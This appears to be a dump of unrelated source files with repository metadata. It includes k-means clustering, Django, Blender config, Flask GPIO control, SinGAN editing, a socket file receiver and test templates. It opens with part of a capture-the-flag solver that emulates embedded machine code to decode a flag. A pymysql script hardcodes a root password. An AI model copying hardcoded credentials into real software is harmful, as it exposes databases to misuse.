0x30,0x31,0xc0,0x66,0x2e,0x0f,0x1f,0x84,0x00,0x00,0x00,
0x00,0x00,0x0f,0x1f,0x00,0x0f,0xb6,0x0c,0x44,0x30,0x88,
0x90,0x10,0x60,0x00,0x0f,0xb6,0x4c,0x44,0x01,0x30,0x88,
0x91,0x10,0x60,0x00,0x48,0x83,0xc0,0x02,0x48,0x83,0xf8,
0x20,0x75,0xe1])
flag = struct.pack ("40B", *[
0xfc,0x14,0xeb,0x09,0xbc,0xae,0xe7,0x47,0x4f,0xe3,0x7c,
0xc1,0x52,0xa5,0x02,0x8e,0x89,0x71,0xc8,0x8d,0x96,0x23,
0x01,0x6d,0x71,0x40,0x5a,0xea,0xfd,0x46,0x1d,0x23,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00])
mu.reg_write(UC_X86_REG_RSP, STACK)
mu.reg_write(UC_X86_REG_XMM0, (matrix[0][0]<<96) + (matrix[0][1]<<64) + (matrix[0][2]<<32) + (matrix[0][3]))
mu.reg_write(UC_X86_REG_XMM1, (matrix[1][0]<<96) + (matrix[1][1]<<64) + (matrix[1][2]<<32) + (matrix[1][3]))
mu.reg_write(UC_X86_REG_XMM2, (matrix[2][0]<<96) + (matrix[2][1]<<64) + (matrix[2][2]<<32) + (matrix[2][3]))
mu.reg_write(UC_X86_REG_XMM3, (matrix[3][0]<<96) + (matrix[3][1]<<64) + (matrix[3][2]<<32) + (matrix[3][3]))
mu.mem_write(FLAG+0x1090, flag)
mu.mem_write(BASE, code)
mu.emu_start(BASE, BASE + len(code), 2 * UC_SECOND_SCALE)
print(mu.mem_read(FLAG+0x1090, 0x20))
def moltiplication(exponent):
a = np.array([ \
[16,15,14,13], \
[12,11,10, 9], \
[8 , 7, 6, 5], \
[4 , 3, 2, 1] \
], dtype=object)
for i in range(exponent):
np.dot(a,a,a)
a = overflow(a)
return a
def overflow(a):
sres = int.from_bytes(data[72:76], byteorder='little')
for x in range(4):
for y in range(4):
while a[x][y] > sres:
a[x][y] %= sres
return a
def calculate_exponents():
res = []
s = 1234567890123456789
i=0
while(s>0):
if 2**i > s:
res.append(i-1)
s -= 2**(i-1)
i=0
else:
i+=1
return res
def main():
matrix = np.array([\
[1,0,0,0], \
[0,1,0,0], \
[0,0,1,0], \
[0,0,0,1] \
], dtype=object)
x = calculate_exponents()
print("lista: ", x)
for a in x:
np.dot(matrix, moltiplicazione(a), matrix)
overflow(matrix)
print("matrix: ", matrix)
emulation(matrix)
main()
|
[
"passwd@mes3hacklab.org"
] |
passwd@mes3hacklab.org
|
84a7a06840ab94d52c126cf03c787d21cc39ba7c
|
66b332e1bc377db177f388a9adf04082113bc7a8
|
/k-means/Kmeans.py
|
f4cd72c11bf9e6f3174767ece3abfe780454d0f7
|
[
"MIT"
] |
permissive
|
JamieMa/ML_APIs
|
68d56263197c7be377f11996a63eaca4376feacd
|
364912bff7e33056de7b8d735ce4d8ab3ed53f81
|
refs/heads/master
| 2021-08-31T00:22:59.409764
| 2017-12-20T00:25:55
| 2017-12-20T00:25:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,089
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 11 21:30:38 2017
@author: mjq
"""
import numpy as np
import pandas as pd
from sklearn import datasets
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.spatial import distance
from numpy import linalg as LA
def kMeans(X,n_clusters=8,max_iter=300,minWCSS=10000):
'''
:type X: 2D np array,each row is a record
n_clusters: positive int
max_iter: positive int
minWCSS:positive int
:rtype: dictionary
'''
if n_clusters>len(X):
print "Number of cluster exceeds number of input records"
print "Please select K again."
return
def WCSS(X,centroids,cluster_result):
sum_WCSS=0
for k in range(len(centroids)):
WCSS_cluster = 0
II = (cluster_result==k)
for j in range(np.sum(II)):
WCSS_cluster+=distance.euclidean(X[II][j],centroids[k])
sum_WCSS+=WCSS_cluster
return sum_WCSS
#randomly select initial centroids
idx = np.random.choice([i for i in range(len(X))],size=n_clusters,replace=False)
centroids = X[idx,:]
cluster_result = np.zeros(len(X))
pre_cluster_result=None
i=0
while i<=max_iter:
#calculate distance
for j in range(len(X)):
min_distance = distance.euclidean(X[j],centroids[0])
num_cluster = 0
for k in range(1,n_clusters):
cur_distance=distance.euclidean(X[j],centroids[k])
if cur_distance<min_distance:
min_distance=cur_distance
num_cluster=k
cluster_result[j]=num_cluster
#check if assignment no longer change
print np.sum(pre_cluster_result==cluster_result)
print np.all(pre_cluster_result==cluster_result)
if pre_cluster_result is not None and np.all(pre_cluster_result==cluster_result):
break
#update centroids
for k in range(n_clusters):
II = (cluster_result==k)
centroids[k]= np.mean(X[II],axis=0)
#deep copy cluster_result to pre_cluster_result
pre_cluster_result = np.copy(cluster_result)
i+=1
cur_WCSS=WCSS(X,centroids,cluster_result)
print "The %d's iterative with WCSS: %f "%(i,cur_WCSS)
final_WCSS=WCSS(X,centroids,cluster_result)
kmeans_result={"cluster_centers_":centroids,
"labels_":cluster_result,
"WCSS_":final_WCSS,
"max_iter_":i}
return kmeans_result
if __name__ == '__main__':
in_file_name = "SCLC_study_output_filtered.csv"
dataIn = pd.read_csv(in_file_name)
X = dataIn.drop(dataIn.columns[0], axis=1)
k=2
myKmeansResults = kMeans(X.values,n_clusters=k)
labels=myKmeansResults['labels_']
|
[
"noreply@github.com"
] |
JamieMa.noreply@github.com
|
45e084179e4aa3dbbf8c2f260fc7c5bd9989286e
|
daf802cfd22614f98596691220c08e15e76fa994
|
/Website/community/rcmOnUser/admin.py
|
389d4206e36951bdbe8c52aac0f01db0cd5d07cd
|
[] |
no_license
|
ee08b397/Community-Recommendation
|
c3b3a534a01622314ea382b4a1d13056537c36a8
|
557e774eeb6045637599f98c130e465bfe345f29
|
refs/heads/master
| 2021-01-17T01:09:28.298491
| 2015-08-15T03:54:04
| 2015-08-15T03:54:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 126
|
py
|
from django.contrib import admin
from rcmOnUser.models import score
# Register your models here.
admin.site.register(score)
|
[
"zhuangzeleng19920731@gmail.com"
] |
zhuangzeleng19920731@gmail.com
|
d0be4c85c1a19f7385e5175292eca406cec92339
|
c8158a7ae28e457e564f1a72b3e82d406aad8c98
|
/cfgs/test_config.py
|
8ca243856ed3a8070dfd268445e5715b8804b742
|
[] |
no_license
|
Wei2624/blender_datasets
|
aad26c7fdfc36c07f8bca3cbab57e16ae489be7a
|
8300b7b35ab5082eeaa313892ad099de74305acc
|
refs/heads/master
| 2020-04-15T19:21:54.028224
| 2019-01-10T02:01:59
| 2019-01-10T02:01:59
| 164,947,207
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,021
|
py
|
no_need_to_copy = ['Camera','Lamp','Lamp.001','Lamp.002','skp_camera_Last_Saved_SketchUp_View','background'\
,'Plane','Plane.001','Plane.002','Plane.003','Plane.004']
# static_classes = ['background','table']
# static_classes_color = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)]
off_table_classes = ['chair']
off_table_classes_color = [(1.0, 0, 1.0)]
static_classes = ['table']
static_classes_color = [(1.0, 0.0, 0.0)]
obj_alpha = 1.0
# changing this can remove certain object from appearing in the scene
# dynamic_classes = ['book', 'keyboard', 'mug', 'detergent', 'bottle', 'pringles']
# dynamic_classes_color = [(0.0, 1.0, 0.0), (0.0, 1.0, 1.0), (0.0, 0.0, 0.5), (0.0, 0.0, 1.0),(1.0, 1.0, 0.0), (1.0, 0.0, 1.0)]
dynamic_classes = ['cerealbox', 'bowl', 'mug', 'can', 'cap']
dynamic_classes_color = [(0.0, 1.0, 0.0), (0.0, 1.0, 1.0), (0.0, 0.0, 0.5), (0.0, 0.0, 1.0),(1.0, 1.0, 0.0)]
# dynamic_classes = ['chair']
# dynamic_classes_color = [(0.0, 1.0, 1.0)]
#table dimension parameters
table_height = 1.
table_dim = (1.5, 1., 1.5)
table_top_num_obj = 4
area_div = 4
v_bound = 0.51
h_bound = 0.51
h_div_unit = 0.03
v_div_unit = 0.03
#Lights parameters
num_of_lights = 3
randomize_xyz = False
lamp_xy = [(1.3, -0.75),(-1.3, -0.75),(0, 1.5)]
plane_scale = 20
light_z_range = (1.8, 3)
range_unit = 0.1
# texture information
tex_idx_dict = {'table0_0':[0],\
'book0_2': [0],'book1_1':[0],'book2_3': [0],'book3_0': [0],'book4_0': [0,1,2,3,4],\
'table1_0':[0],\
'bottle0_4': [0],'bottle1_4': [0],'bottle2_0': [0],'bottle3_11':[0],'bottle4_10':[0],'bottle4_15':[0],'bottle5_1': [0],'bottle5_9': [0],'bottle6_0': [0],\
'table2_0': [0],\
'detergent0_1':[0],'detergent1_0': [0],'detergent2_4': [0],'detergent3_3': [0],'detergent3_5': [0],'detergent4_0': [0],'detergent5_7': [0],\
'table3_0':[2],\
'keyboard0_24':[0],'keyboard1_190':[0],'keyboard2_72':[0],'keyboard3_99':[0],'keyboard4_484':[0],'keyboard5_289':[0],\
'table4_0':[0],\
'mug0_0': [0],'mug1_3': [0],'mug2_5': [0],'mug3_0': [0],'mug4_7': [0],'mug5_2': [0],'mug6_0': [0],'mug7_2':[0], 'mug8_6':[0],'mug9_4':[0],'mug10_3':[0],\
'table5_0':[0],'table6_0':[1],'table7_0': [0],'chair8_0': [0],'chair9_0':[0],\
'pringles1_1': [0],'pringles1_2': [0],'pringles2_2': [0],\
'cerealbox0_0': [0],'cerealbox0_1': [0],'cerealbox0_3': [0],'cerealbox0_5': [0],'cerealbox0_6': [0],'cerealbox0_7': [0],'cerealbox0_8': [0],\
'cerealbox1_71': [0],'cerealbox1_166': [0],'cerealbox1_66': [0],'cerealbox1_123': [0],\
'cerealbox2_493': [0],'cerealbox2_302': [0],'cerealbox2_349': [0],'cerealbox2_256': [0],'cerealbox2_194': [0],'cerealbox2_494': [0],'cerealbox2_225': [0],'cerealbox2_257': [0], 'cerealbox2_203': [0],\
'cerealbox3_1': [0],'cerealbox3_5': [0],'cerealbox3_4': [0],'cerealbox3_0': [0],'cerealbox3_2': [0],\
'cerealbox4_42': [0], \
'cerealbox5_0': [0], 'cerealbox5_1': [0],'cerealbox5_2': [0],'cerealbox5_4': [0],\
'cerealbox6_6': [0], 'cerealbox7_0': [0], 'cerealbox8_5':[0],'cerealbox8_0':[0],'cerealbox8_1':[0],'cerealbox8_6':[0],\
'cerealbox9_5':[0],\
'bowl0_2': [0],'bowl1_0': [0],'bowl2_2': [0], 'bowl3_1': [0], 'bowl4_1': [0], 'bowl5_0': [0], 'bowl6_0':[0],\
'can0_3': [0], 'can1_8': [0], 'can2_0': [0], 'can3_0': [0], 'can4_5': [0], 'can5_1': [0],\
'cap0_0': [0],'cap1_60': [0], 'cap1_102': [0], 'cap2_6': [0], 'cap3_2': [0], 'cap4_21': [0], 'cap5_10':[0], 'cap6_15':[0], 'cap6_11':[0],\
'cap7_0': [0], 'cap8_16':[0], 'cap8_0': [0],\
'chair0_0': [2],'chair1_0':[0], 'chair2_0': [2], 'chair3_0': [0,1,2,3,4],'chair4_0':[0],'chair5_0':[1],'chair6_0': [0],'chair7_0':[2],'chair8_0':[3],'chair9_0':[3]
}
# Gaussian samples
normal_m = 0
normal_s = 0.2
# position of background in range on x y
background_range = (1.2, 2.7)
# interval where script reloads a scene
change_scene_interval = 4
# camera parameters for keyframes
degree_interval = 30
num_degrees = 12
cam_height_range = (1.3, 2.7)
cam_xy_range = (1.5, 2.5)
total_frames = 100
target_point = (0,0,1.2)
|
[
"weiuw2624@gmail.com"
] |
weiuw2624@gmail.com
|
ddcda8626fa93c0e39ab42cbd537075f0c2726a5
|
0fe5a7ede2c3e8c4d47a85eebe959e2ab749568b
|
/kits19.py
|
2735abe5d5da8a3f71086197a6fd9c09999151e8
|
[] |
no_license
|
FlyGlider/Kits19
|
2ad9e1befb44f7e23f56c8b42b1b81d350361620
|
20efc3327c7a74431bb53fc3d58e453b791df49e
|
refs/heads/master
| 2020-06-25T23:03:51.926141
| 2019-07-29T12:35:42
| 2019-07-29T12:35:42
| 199,448,545
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,893
|
py
|
from utils.trainer import *
from utils.evaluator import Evaluator
# from utils.tester import Tester
plt.switch_backend('agg')
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--epoch', dest='epoch', default=100, type=int,
help='number of epochs')
parser.add_argument('-b', '--batch-size', dest='batchsize', default=1,
type=int, help='batch size')
parser.add_argument('-l', '--learning-rate', dest='lr', default=0.0003,
type=float, help='learning rate')
parser.add_argument('-g', '--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
parser.add_argument('-v', '--val', dest='val', default=0,
type=int, help='choose which validation')
parser.add_argument('-r', '--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)') # checkpoints_2d/model_best_0_200.pth
parser.add_argument('-w', '--num_workers', dest='num_workers', default=0,
type=int, help='how many subprocesses to use for data loading')
parser.add_argument('-p', '--pre_load', dest='pre_load', default=False,
type=bool, help='whether to pre-load dataset') # 实际上只要输入就是True
parser.add_argument('--ts', dest='train_samples', default=1000,
type=int, help='how many train sample in one epoch')
parser.add_argument('--vs', dest='val_samples', default=100,
type=int, help='how many val sample in one epoch')
parser.add_argument('-s', '--stage', dest='stage', default='train',
type=str, help='choose the best model in which stage')
args = parser.parse_args()
return args
if __name__ == '__main__':
dir_h5_train = 'h5_data_train_2d/'
dir_checkpoint = 'checkpoints/2d/'
dir_prediction = 'predictions/2d/'
create_dir(dir_checkpoint)
create_dir(dir_prediction)
dataset_props = load_pickle('dataset_props.pkl')
pool_layer_kernel_sizes = dataset_props['plan_2d']['pool_layer_kernel_sizes']
args = get_args()
model = ResUNet(in_ch=1, base_num_features=30, num_classes=3, norm_type='batch', nonlin_type='relu', pool_type='max',
pool_layer_kernel_sizes=pool_layer_kernel_sizes, deep_supervision=True, mode='2D')
trainer = Trainer(model, dir_h5_train, dir_checkpoint, args)
trainer.run()
model = ResUNet(in_ch=1, base_num_features=30, num_classes=3, norm_type='batch', nonlin_type='relu', pool_type='max',
pool_layer_kernel_sizes=pool_layer_kernel_sizes, deep_supervision=False, mode='2D')
evaluator = Evaluator(model, dir_h5_train, dir_checkpoint, dir_prediction, args)
evaluator.run()
|
[
"noreply@github.com"
] |
FlyGlider.noreply@github.com
|
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c
|
bec66ec0c920939547466b2b8f9d65813d560d1d
|
/noxious/__init__.py
|
f007d1198e0435f72d773eb479f29a48d9534092
|
[] |
no_license
|
mbr/noxious
|
cbb3be2ca725a0282db390520306da7ebba75339
|
6c48fe84867d80614defa6bdce4d4640ce657ae5
|
refs/heads/master
| 2023-06-06T20:42:08.079423
| 2015-08-30T10:54:52
| 2015-08-30T10:54:52
| 41,625,389
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,557
|
py
|
import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
|
[
"git@marcbrinkmann.de"
] |
git@marcbrinkmann.de
|
b0f222bd5a142c4071329ebd4c463e0851986566
|
d9a1999622bed85264ac65c57e90368d1a6e0e3e
|
/IoT/Flask/Exercise2.py
|
07ed4802fe801fde1e0b9bc9755ec8a7692341d5
|
[] |
no_license
|
dev-saem/IoT
|
38769f1906429c039e310daa1f8da74549c6e3e2
|
43ba904dd013c3d49ca8bfaa93cf2d6385d64927
|
refs/heads/main
| 2023-08-20T02:08:36.760510
| 2021-10-21T05:11:40
| 2021-10-21T05:11:40
| 419,588,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
import RPi.GPIO as GPIO
from flask import Flask
from time import sleep
app = Flask(__name__)
@app.route('/')
def hello():
return "hello world"
@app.route('/fan/<onoff>/<time>')
def fanonoff(onoff, time):
if (onoff == "on") and (time == "1"):
print("FAN on for one second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(1.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 1 second"
elif (onoff == "on") and (time == "2"):
print("FAN on for two second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(2.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 2 seconds"
elif (onoff == "on") and (time == "3"):
print("FAN on for three second")
GPIO.output(18,1)
GPIO.output(27,0)
sleep(3.0)
GPIO.output(18,0)
GPIO.output(27,0)
return "FAN on for 3 seconds"
if __name__ == "__main__":
GPIO.setmode(GPIO.BCM)
GPIO.setup(4,GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(18, GPIO.OUT, initial = GPIO.LOW)
GPIO.setup(27, GPIO.OUT, initial = GPIO.LOW)
app.run(host = '0.0.0.0', port = 5000, debug = True)
|
[
"noreply@github.com"
] |
dev-saem.noreply@github.com
|
f37668bdf7c079415ac4d8ece79b2a23765d21aa
|
71449d985dd2d9f9133822952664a19b0dbfaf91
|
/combine/files/utils.py
|
f8d1268f777119a44ce6aab38f97b2b86f8fbe75
|
[
"MIT"
] |
permissive
|
dropseed/combine
|
f7e6387f2a2a18420398022622afe9c1188fcced
|
7bf2b513877ddbc9911f0e79f9b82c3a770cece7
|
refs/heads/master
| 2023-07-05T22:35:23.107892
| 2023-07-04T01:51:25
| 2023-07-04T01:51:25
| 137,275,296
| 11
| 3
|
MIT
| 2023-09-04T20:14:40
| 2018-06-13T21:50:06
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
import os
def create_parent_directory(path: str) -> None:
path_dir = os.path.dirname(path)
if not os.path.exists(path_dir):
os.makedirs(path_dir)
|
[
"dave.gaeddert@gmail.com"
] |
dave.gaeddert@gmail.com
|
a15aa9381f0639460207512eace0c0e66ea54b4b
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py
|
1ce019700e7801903c6df341e812f94f4b2cb946
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
# Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x=int(input("informe o dividendo: " ))
y=int(input("informe o divisor: " ))
print (x)
print (y)
print (x//y)
print (x%y)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
0c14069b57089a2f4811e42046ae71152a6bdbd6
|
f066a92934f4d6c64d20bc3c455ee1100624983b
|
/run/stdio.py
|
4c26791e53b62afe6a488d1086c07419ea38a737
|
[] |
no_license
|
BitOpenFPGA/fpga_test_soc
|
229a15f0ff7280546a6a250dab624db04b196dd8
|
fe7c5f7b655371ed3be7f2171301608e24180491
|
refs/heads/master
| 2022-04-07T12:49:55.872758
| 2020-03-21T10:49:15
| 2020-03-21T10:49:15
| 304,899,091
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,166
|
py
|
#!/usr/bin/env python
import sys
import atexit
import termios
import os
orig_term = None
##################################################################
# stdio_init
##################################################################
def stdio_init():
atexit.register(stdio_close)
global orig_term
orig_term = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON)
new_settings[6][termios.VMIN] = 0
new_settings[6][termios.VTIME] = 0
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
##################################################################
# stdio_close
##################################################################
def stdio_close():
global orig_term
if orig_term:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_term)
##################################################################
# stdio_read
##################################################################
def stdio_read():
ch = os.read(sys.stdin.fileno(), 1)
if len(ch) > 0:
return ch;
else:
return None
|
[
"ultraembedded.com@gmail.com"
] |
ultraembedded.com@gmail.com
|
cb49bec2a5718c4576520ccf546458370bb74044
|
a8f73dcf71eb3be1387a4c5fc766ad2e14a64fd4
|
/recorder/scripts/socket_server.py
|
cdeaa0ede4b5933db55dd0fb9eb94743ff33cd30
|
[] |
no_license
|
ZhengYi0310/eve_workspace
|
3a192ab797fe21130ba45a9a09431ddc8f5662a5
|
5c73cebfaf37820ba4d1f1354632370434816921
|
refs/heads/master
| 2021-01-19T02:10:18.657989
| 2017-06-30T19:14:05
| 2017-06-30T19:14:05
| 87,264,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
# first of all import the socket library
import socket
ip = socket.gethostbyname('bml-ALL-SERIES')
print "The client hostname is %s." %(ip)
# next create a socket object
s_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "socket on eve successfully created."
# reserve a port on the pc, just set it to 12345
port = 9999
# Next bind to the port
# we have not typed any ip in the ip field
# instead we have inputted an empty string
# this makes the server listen to requests
# coming from other computers on the network
s_server.bind(("eve", port))
print "socket binded to %s." %(port)
s_server.listen(10)
s_client, address = s_server.accept()
print "socket is listening."
print s_client.recv(8192)
s_client.send('Hello Joy !')
print "handshake ! now starting transfer file !"
f = open("test.json", "wb")
l = s_client.recv(8192)
while (l):
f.write(l)
l = s_client.recv(1024)
#print "receiving"
s_client.send('file received by Eve!')
print "file received !"
f.close()
s_client.close()
s_server.close()
|
[
"hczhengcq@gmail.com"
] |
hczhengcq@gmail.com
|
d020f7a59f0738fc32cb65ab2d97b3c8c707060d
|
5c5beb07756060ce7ccc9c4256d4c5521f4acee9
|
/SinGAN/editing.py
|
32221515e948beb759f9377ecae96fee275d20b5
|
[] |
no_license
|
JaeDukSeo/SinGAN-extension
|
a2e5fb3ae442a28cebe77592a3668367347e3422
|
23afc01ebe568f93e01c377b0a94e0dad26ac64a
|
refs/heads/master
| 2022-07-03T12:04:56.295212
| 2020-05-13T15:24:48
| 2020-05-13T15:24:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,301
|
py
|
from .config import get_arguments
from .SinGAN.manipulate import *
from .SinGAN.training import *
from .SinGAN.imresize import imresize
from .SinGAN.imresize import imresize_to_shape
from .SinGAN import functions
if __name__ == '__main__':
parser = get_arguments()
parser.add_argument('--input_dir', help='input image dir', default='Input\\Images')
parser.add_argument('--input_name', help='training image name', required=True)
parser.add_argument('--ref_dir', help='input reference dir', default='Input\\Editing')
parser.add_argument('--ref_name', help='reference image name', required=True)
parser.add_argument('--editing_start_scale', help='editing injection scale', type=int, required=True)
parser.add_argument('--mode', help='task to be done', default='editing')
opt = parser.parse_args()
opt = functions.post_config(opt)
Gs = []
Zs = []
reals = []
NoiseAmp = []
dir2save = functions.generate_dir2save(opt)
if dir2save is None:
print('task does not exist')
#elif (os.path.exists(dir2save)):
# print("output already exist")
else:
try:
os.makedirs(dir2save)
except OSError:
pass
real = functions.read_image(opt)
real = functions.adjust_scales2image(real, opt)
Gs, Zs, reals, NoiseAmp = functions.load_trained_pyramid(opt)
if (opt.editing_start_scale < 1) | (opt.editing_start_scale > (len(Gs)-1)):
print("injection scale should be between 1 and %d" % (len(Gs)-1))
else:
ref = functions.read_image_dir(os.path.join(opt.ref_dir, opt.ref_name), opt)
mask = functions.read_image_dir(os.path.join(opt.ref_dir,'{}_mask{}'.format(opt.ref_name[:-4],opt.ref_name[-4:])), opt)
if ref.shape[3] != real.shape[3]:
'''
mask = imresize(mask, real.shape[3]/ref.shape[3], opt)
mask = mask[:, :, :real.shape[2], :real.shape[3]]
ref = imresize(ref, real.shape[3] / ref.shape[3], opt)
ref = ref[:, :, :real.shape[2], :real.shape[3]]
'''
mask = imresize_to_shape(mask, [real.shape[2],real.shape[3]], opt)
mask = mask[:, :, :real.shape[2], :real.shape[3]]
ref = imresize_to_shape(ref, [real.shape[2],real.shape[3]], opt)
ref = ref[:, :, :real.shape[2], :real.shape[3]]
mask = functions.dilate_mask(mask, opt)
N = len(reals) - 1
n = opt.editing_start_scale
in_s = imresize(ref, pow(opt.scale_factor, (N - n + 1)), opt)
in_s = in_s[:, :, :reals[n - 1].shape[2], :reals[n - 1].shape[3]]
in_s = imresize(in_s, 1 / opt.scale_factor, opt)
in_s = in_s[:, :, :reals[n].shape[2], :reals[n].shape[3]]
out = SinGAN_generate(Gs[n:], Zs[n:], reals, NoiseAmp[n:], opt, in_s, n=n, num_samples=1)
plt.imsave(os.path.join(dir2save,'start_scale={}.png'.format(opt.editing_start_scale)), functions.convert_image_np(out.detach()), vmin=0, vmax=1)
out = (1-mask)*real+mask*out
plt.imsave(os.path.join(dir2save,'start_scale={}_masked.png'.format(opt.editing_start_scale)), functions.convert_image_np(out.detach()), vmin=0, vmax=1)
|
[
"victorruelle1@hotmail.com"
] |
victorruelle1@hotmail.com
|
fc8f57dcba1a88d5f1ae5e3963414387e47a3e5e
|
2a4fccb212b70bbef7634271b3a0992e8927abd8
|
/shop/migrations/0003_promo_date_fin.py
|
89d89e8e1abad1c780b0d1a8de33a0159d058fb4
|
[] |
no_license
|
snipercode221/cbshop
|
dd9eca3400ea500122289658592af52a81e99f6c
|
d139f27a540a458bc011c175e0899f4716d7ebb2
|
refs/heads/master
| 2022-11-29T23:43:47.304965
| 2020-08-02T00:08:00
| 2020-08-02T00:08:00
| 284,359,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-23 21:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0002_promo_pub'),
]
operations = [
migrations.AddField(
model_name='promo',
name='date_fin',
field=models.DateTimeField(null=True, verbose_name='fin promo'),
),
]
|
[
"snipercode221@gmail.com"
] |
snipercode221@gmail.com
|
4b62cb9c5ec11f7f8d43be007fc17be6e900bf2e
|
56909e729bc02088a79ac1d46111de7a52e4c9a6
|
/venv/dbms.py
|
d747ad4c5c69e6f417d24ff9428ebde68d2bb826
|
[] |
no_license
|
prasanthtummala/ArtGallery-DataBase
|
a1a623ace9554139a6a43f8102d9b5dd96b2d609
|
293ac756c64208a2382df82d861de072797b3fa0
|
refs/heads/master
| 2020-06-12T12:55:07.283929
| 2019-06-28T16:46:54
| 2019-06-28T16:46:54
| 194,305,653
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import pymysql
# Open database connection
db = pymysql.connect("localhost","root","123456","artgallery" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
# Prepare SQL query to INSERT a record into the database.
sql = "SELECT * FROM "
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
results = cursor.fetchall()
for row in results:
MNAME = row[0]
gross = row[1]
# Now print fetched result
print ("{0} {1} ".format(MNAME,gross))
except:
print ("Error: unable to fetch data")
# disconnect from server
db.close()
|
[
"prasanthtummala.17@gmail.com"
] |
prasanthtummala.17@gmail.com
|
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0
|
f63907d2115becd64704ef1881f3bfcb7ba9047d
|
/sandbox/test/testTemplate.py
|
91ba4b483092ee7a004dca1be860007bfd13cdaa
|
[] |
no_license
|
AseiSugiyama/NZMATH-Python3
|
d456610f72071a654531583228e439ffa8a4db0c
|
f65b176be2e58fafa0eea91f399c9ab17f3f478b
|
refs/heads/master
| 2020-05-21T07:26:51.434191
| 2019-04-27T09:52:18
| 2019-04-27T09:52:18
| 185,959,644
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
Test classes must inherite unittest.TestCase.
They have name suffixed with 'Test'.
"""
def setUp(self):
"""
setUp is run before each test method run.
"""
pass
def tearDown(self):
"""
tearDown is run after each test method run.
"""
pass
def testHuga(self):
"""
Every test method have name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"devnull@localhost"
] |
devnull@localhost
|
35da38996a54cfbccf733b5859960068514b4714
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2332/60592/271480.py
|
f602a8c01f31dbba291aa53971306002fff48fef
|
[] |
no_license
|
